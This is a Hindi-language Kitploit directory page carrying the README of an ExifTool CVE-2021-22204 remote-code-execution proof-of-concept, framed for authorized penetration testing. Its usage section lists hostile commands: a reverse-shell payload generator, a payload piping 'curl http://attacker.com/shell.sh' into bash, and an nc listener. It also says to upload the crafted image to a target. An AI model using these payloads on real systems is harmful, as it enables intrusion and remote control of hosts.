Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-22204 — ExifTool RCE exploit (CVE-2021-22204) - बेहतर संस्करण, कोई exiftool निर्भरता नहीं | Kitploit
उपकरण/GitHubGitHub/d4ytox/cve-2021-22204
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubd4ytox/cve-2021-22204

CVE-2021-22204

ExifTool RCE exploit (CVE-2021-22204) - बेहतर संस्करण, कोई exiftool निर्भरता नहीं

रिपॉजिटरी देखें
191 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-22204 - ExifTool मनमाना कोड निष्पादन

CVE-2021-22204 के लिए एक उन्नत प्रूफ-ऑफ-कॉन्सेप्ट, जो ExifTool संस्करण 7.44 से 12.23 में एक भेद्यता है जो दुर्भावनापूर्ण DjVu फ़ाइलों को संसाधित करते समय मनमाना कोड निष्पादन की अनुमति देती है।

श्रेय

यह व्युत्पन्न कार्य है। भेद्यता और मूल शोषण मेरे नहीं हैं।

भूमिकाकौन
भेद्यता की खोज किसके द्वारा की गईWilliam Bowling (@wcbowling), GitLab बग बाउंटी कार्यक्रम के माध्यम से रिपोर्ट की गई — अप्रैल 2021
मूल PoC किसके द्वाराUNICORD (NicPWNs & Dev-Yeoj)
इस रिपॉजिटरी में संशोधन किसके द्वाराd4ytox

विवरण

ExifTool संस्करण 7.44 से 12.23 में DjVu फ़ाइल प्रारूप में उपयोगकर्ता डेटा का अनुचित न्यूट्रलाइज़ेशन, दुर्भावनापूर्ण छवि को पार्स करते समय मनमाना कोड निष्पादन की अनुमति देता है। यह शोषण एक दुर्भावनापूर्ण छवि फ़ाइल उत्पन्न करता है, जिसे संसाधित करने पर, एक भेद्य ExifTool संस्करण, हमलावर-नियंत्रित कोड निष्पादित करता है।

यह संस्करण क्या बदलता है

UNICORDev/exploit-CVE-2021-22204 पर आधारित:

  • हमलावर मशीन पर कोई ExifTool निर्भरता नहीं - मूल पेलोड को एम्बेड करने के लिए exiftool -config का उपयोग करता है, जो विफल हो जाता है यदि आपका अपना ExifTool पैच किया गया है (v12.24+)। यह संस्करण केवल djvumake का उपयोग करके एक शुद्ध DjVu पेलोड बनाता है।
  • आधुनिक Kali पर काम करता है - Python 3.12+ के साथ संगत (\c एस्केप अनुक्रम चेतावनी को ठीक करता है)
  • न्यूनतम निर्भरताएँ - केवल djvulibre-bin पैकेज की आवश्यकता है
  • स्वच्छ, न्यूनतम कोड - कोई ASCII कला या कृत्रिम देरी नहीं

ये एक मौजूदा शोषण में इंजीनियरिंग परिवर्तन हैं। कोई भेद्यता अनुसंधान का दावा नहीं किया गया है।

आवश्यकताएँ

sudo apt install djvulibre-bin

उपयोग

रिवर्स शेल:

python3 exploit.py -s <LHOST> <LPORT>

कस्टम कमांड:

python3 exploit.py -c "id > /tmp/pwned"

उदाहरण:

# रिवर्स शेल पेलोड उत्पन्न करें
python3 exploit.py -s 192.168.1.100 4444

# कमांड निष्पादन पेलोड उत्पन्न करें  
python3 exploit.py -c "curl http://attacker.com/shell.sh | bash"

# लिसनर शुरू करें और कॉलबैक की प्रतीक्षा करें
nc -nlvp 4444

शोषण image.jpg उत्पन्न करता है - इसे एक लक्ष्य पर अपलोड करें जहाँ ExifTool इसे संसाधित करेगा।

प्रभावित संस्करण

  • ExifTool 7.44 - 12.23

संदर्भ

  • NVD प्रविष्टि - CVE-2021-22204
  • William Bowling द्वारा मूल रिपोर्ट - HackerOne #1154542
  • ExifTool सलाह
  • ExifTool पैच कमिट
  • मूल PoC - UNICORDev/exploit-CVE-2021-22204

अस्वीकरण

यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। इस शोषण का उपयोग केवल उन प्रणालियों के विरुद्ध करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है और कानून द्वारा दंडनीय है। जिम्मेदारी से उपयोग करें।

लाइसेंस

MIT, केवल इस रिपॉजिटरी में संशोधनों पर लागू। अपस्ट्रीम PoC कोई लाइसेंस नहीं रखता है, इसलिए यह अपने लेखकों द्वारा सर्वाधिकार सुरक्षित रहता है। पूर्ण एट्रिब्यूशन सूचना के लिए LICENSE देखें।

टूल डाउनलोड करें